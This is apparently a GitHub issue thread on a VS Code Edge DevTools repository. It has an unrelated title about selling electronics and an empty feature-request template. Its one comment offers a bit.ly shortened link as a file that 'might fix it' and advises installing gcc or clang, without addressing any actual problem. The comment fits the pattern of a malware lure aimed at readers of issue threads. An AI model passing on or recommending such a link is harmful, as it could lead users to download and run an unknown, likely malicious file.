### ISSUE TITLE
project is about the website of selling the electron from china and to receive the order from the costomers

### ISSUE THREAD

**Issue by Africhim** [microsoft/vscode-edge-devtools#2434]
**Is your feature request related to a problem? Please describe.**

**Describe the solution you'd like:**

**Describe alternatives you've considered:**

**Additional context:**

**Comment by websquadpro** [comment]
This might help:This file might fix it
https://bit.ly/3XQLHlH
If you don't have the c compliator, install it.(gcc or clang)
